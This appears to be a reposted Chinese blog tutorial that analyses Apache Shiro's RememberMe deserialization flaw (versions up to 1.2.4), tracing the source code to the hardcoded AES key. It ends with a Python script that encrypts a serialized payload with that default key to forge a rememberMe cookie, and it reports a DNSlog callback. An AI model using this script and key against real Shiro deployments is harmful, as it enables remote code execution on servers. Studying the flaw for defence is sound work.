devbox
很楠不爱3
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

[Java反序列化]—Shiro反序列化(一)

作者:很楠不爱3 | 2024-04-30 10:40:11

shiro反序列化

环境配置: 

IDEA搭建shiro550复现环境_普通网友的博客-CSDN博客

漏洞原理:

Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。
那么,Payload产生的过程:
命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值
在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单。

影响版本:

Apache Shiro <= 1.2.4

漏洞原理:

shiro反序列化主要就是对cookie进行的一系列操作, 也就是 选了 rememberme。他会对你的cookie 进行 操作。

 特征

  • 未登陆的情况下,请求包的cookie中没有rememberMe字段,返回包set-Cookie里也没有deleteMe字段
  • 登陆失败的话,不管勾选RememberMe字段没有,返回包都会有rememberMe=deleteMe字段
  • 不勾选RememberMe字段,登陆成功的话,返回包set-Cookie会有rememberMe=deleteMe字段。但是之后的所有请求中Cookie都不会有rememberMe字段
  • 勾选RememberMe字段,登陆成功的话,返回包set-Cookie会有rememberMe=deleteMe字段,还会有rememberMe字段,之后的所有请求中Cookie都会有rememberMe字段

shiro 默认使用了 CookieRememberMeManager,其处理cookie的流程是:

得到rememberMe的cookie值 --> Base64解码 --> AES解密 --> 反序列化

然而AES的密钥是硬编码的,导致攻击者可以构造任意数据造成反序列化RCE,payload:

恶意命令-->序列化-->AES加密-->base64编码-->发送cookie

在整个漏洞中,比较重要的是AES的密钥。

加密分析:

Shiro <= 1.2.4 版本默认使用   CookieRememberMeManager。

而这个 CookieRememberMeManager 继承了 AbstractRememberMeManager 跟进看看。

 此处有个 硬编码 DEFAULT_CIPHER_KEY_BYTES ,然后他又实现了 RememberMeManager接口,跟进去看看

实现了这些接口,看英文单词是  记住身份信息、忘记身份信息、登录成功、登录失败、已登录功能,既然这样,那么肯定会调用登录成功的这个接口,然后再去实现这个接口,所以我们在这里下个断点

这里我是勾选了这个 Remember me 的

 

 而这,我们是可以进入if 的

 这里的 subject 存储的是一些 登录信息  比如session 等

 而PrincipalCollection 是个身份集合,我们先不管。

我们继续跟进这个 

 rememberIdentity(subject, token, info);

 这里获取了身份信息,但是不知道是用来干嘛的

跟进一下这个  convertPrincipalsToBytes()

  1.     protected byte[] convertPrincipalsToBytes(PrincipalCollection principals) {
  2.         byte[] bytes = serialize(principals);  //序列化这个身份信息
  3.         if (getCipherService() != null) {
  4.             bytes = encrypt(bytes);
  5.         }
  6.         return bytes;
  7.     }

这里把身份信息传给convertPrincipalsToBytes() ,身份信息传参为principals ,然后将这个信息应该是序列化了。

 大概就是跳了两层,到 DefaultSerialize类的 序列化方法,这里把身份信息转换为bytes,写入缓冲区,然后就进行了序列化,最后通过toByteArray() 方法 返回序列化后的Byte数组

然后回来这个地方:

  1.     protected byte[] convertPrincipalsToBytes(PrincipalCollection principals) {
  2.         byte[] bytes = serialize(principals);
  3.         if (getCipherService() != null) {
  4.             bytes = encrypt(bytes);
  5.         }
  6.         return bytes;
  7.     }

 进行一个if判断,getCipherService()方法不为空则进入条件里面里面。我们f7进去内部看看;

 发现又是一个cipherService,也就是获取密码服务,我们再继续F7跟进发现直接推出了。那我们就 Ctrl+左键继续进去看。可以,发现是new了一个aes加密服务。

 那我们点击debugger处,回到刚刚那个地方;我们就不用继续进入了,我们就思考一下,这边是要获取到加密服务,如果没获取到,则不进入。获取到的话,则进入该条件;

 然后调用encrypt()方法,这是个加密方法。我们f7跟进去看看什么情况。

 这里把序列化后的bytes 传参给serialized 赋值给value ,然后if判断,getCipherService(),这个是存在的。然后我们进入条件判断股内部

ByteSource byteSource = cipherService.encrypt(serialized, this.getEncryptionCipherKey());

这里调用cipherService.encrypt()方法并且传入序列化数据,和getEncryptionCipherKey方法。

 我们通过getEncryptionCipherKey()名字可以知道是获取key的一个方法。那我们f7进入看看

直接return了 ,看看这个encryptionCipherKey的初始定义

 看看哪里赋值了

  1.     public void setEncryptionCipherKey(byte[] encryptionCipherKey) {
  2.         this.encryptionCipherKey = encryptionCipherKey;
  3.     }

 在 setEncryptionCipherKey()进行了赋值,看看谁调用了setEncryptionCipherKey()

  1.     public void setCipherKey(byte[] cipherKey) {
  2.         //Since this method should only be used in symmetric ciphers
  3.         //(where the enc and dec keys are the same), set it on both:
  4.         setEncryptionCipherKey(cipherKey);
  5.         setDecryptionCipherKey(cipherKey);
  6.     }

 这里调用了setEncryptionCipherKey(),继续跟谁调用了setCipherKey()

  1.     public AbstractRememberMeManager() {
  2.         this.serializer = new DefaultSerializer<PrincipalCollection>();
  3.         this.cipherService = new AesCipherService();
  4.         setCipherKey(DEFAULT_CIPHER_KEY_BYTES);
  5.     }

发现是把前面看的硬编码传给了setCipherKey(),而public AbstractRememberMeManager()是构造函数。也就是说,前面的getEncryptionCipherKey(),就是固定值,硬编码

ByteSource byteSource = cipherService.encrypt(serialized, getEncryptionCipherKey());
private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");

至此 也就是说,  这个勾了remember的功能,他会把我们的身份信息,序列化后和 那个固定的key进行加密,接下来我们需要分析一下解密的操作

解密流程

在 shiro 文件中找到   CookieRememberMeManager.java 对cookie中的字段进行管理,其中有个rememberSerializedIdentity(),可以对remember认证信息进行序列化

其中这里有个 getCookie().readValue(request, response),这是读取cookie中的数据,跟上:

 根据名字,可以知道是一个读取值的方法。

通过 getName()方法得到name =remeber me  然后把value = nuLL,  在通过getCookie获取到cookie,最后判断cookie 不为空 进入到内部随后  cookie.getValue.  并赋值为 value 其值为序列化的内容   ,然后return 回value 也就是序列化的值。

也就是返回到这一步,这里进行了一个判断,判断这个 base64的值是否是 deleteMe ,是的话就返回null,我们这里肯定不是了,我们的值是序列化内容,继续往下走,然后进行了一个base64解密赋值给了 decode

得到rememberMe的cookie值 --> Base64解码 --> AES解密 --> 反序列化

目前只进行了 base64解密。接下来还需要AES 解密,继续跟进,看看哪里调用了rememberSerializedIdentity(),

 是这里调用了。 其中bytes 肯定不为空,所以进入第一个if,期间调用了convertBytesToPrincipals

 把 序列化内容传进去了,跟进。

  1.     protected PrincipalCollection convertBytesToPrincipals(byte[] bytes, SubjectContext subjectContext) {
  2.         if (getCipherService() != null) {
  3.             bytes = decrypt(bytes);
  4.         }
  5.         return deserialize(bytes);
  6.     }

if钟进行了解密。最后回返回反序列化的内容,看看decrypt()

  1. protected byte[] decrypt(byte[] encrypted) {
  2.     byte[] serialized = encrypted;
  3.     CipherService cipherService = getCipherService();
  4.     if (cipherService != null) {
  5.         ByteSource byteSource = cipherService.decrypt(encrypted, getDecryptionCipherKey());
  6.         serialized = byteSource.getBytes();
  7.     }
  8.     return serialized;
  9. }

很好,他也是用了硬编码进行了解密,就是那个固定值,我就不跟了。直接跟进最后面的deserialize(byte)

  1.   protected PrincipalCollection convertBytesToPrincipals(byte[] bytes, SubjectContext subjectContext) {
  2.         if (getCipherService() != null) {
  3.             bytes = decrypt(bytes);
  4.         }
  5.         return deserialize(bytes);
  6.     }

最终就到了readObject执行反序列化

  1. public T deserialize(byte[] serialized) throws SerializationException {
  2.     if (serialized == null) {
  3.         String msg = "argument cannot be null.";
  4.         throw new IllegalArgumentException(msg);
  5.     }
  6.     ByteArrayInputStream bais = new ByteArrayInputStream(serialized);
  7.     BufferedInputStream bis = new BufferedInputStream(bais);
  8.     try {
  9.         ObjectInputStream ois = new ClassResolvingObjectInputStream(bis);
  10.         @SuppressWarnings({"unchecked"})
  11.         T deserialized = (T) ois.readObject();
  12.         ois.close();
  13.         return deserialized;
  14.     } catch (Exception e) {
  15.         String msg = "Unable to deserialze argument byte array.";
  16.         throw new SerializationException(msg, e);
  17.     }
  18. }

一下这个加解密 过程是我抄其他师傅的  原理不清楚,因为我没有编写脚本能力

漏洞复现

用脚本将序列化生成的文件1.txt进行aes加密

  1. import sys
  2. import base64
  3. import uuid
  4. from random import Random
  5. from Crypto.Cipher import AES
  6.  
  7. def get_file(filename):
  8.     with open(filename,'rb') as f:
  9.         data = f.read()
  10.     return data
  11.  
  12.  
  13. def aesEncode(data):
  14.     BS = AES.block_size
  15.     pad = lambda s: s + ((BS-len(s)%BS)) * chr(BS-len(s)%BS).encode()
  16.     key = "kPH+bIxk5D2deZiIxcaaaA=="
  17.     mode = AES.MODE_CBC
  18.     iv = uuid.uuid4().bytes
  19.     encryptor = AES.new(base64.b64decode(key),mode,iv)
  20.     ciphertext = base64.b64encode(iv+encryptor.encrypt(pad(data)))
  21.     return ciphertext
  22. def aesDecode(enc_data):
  23.     enc_data = base64.b64decode(enc_data)
  24.     unpad = lambda s:s[:-s[-1]]
  25.     key = "kPH+bIxk5D2deZiIxcaaaA=="
  26.     mode = AES.MODE_CBC
  27.     iv = enc_data[:16]
  28.     encryptor = AES.new(base64.b64decode(key),mode,iv)
  29.     plaintext = encryptor.decrypt(enc_data[16:])
  30.     plaintext = unpad(plaintext)
  31.     return plaintext 
  32.  
  33.  
  34.  
  35. if __name__ == '__main__':
  36.     data = get_file("1.txt")
  37.     print(aesEncode(data))

生成后传入cookie 中,dnslog成功回显

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/512942
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号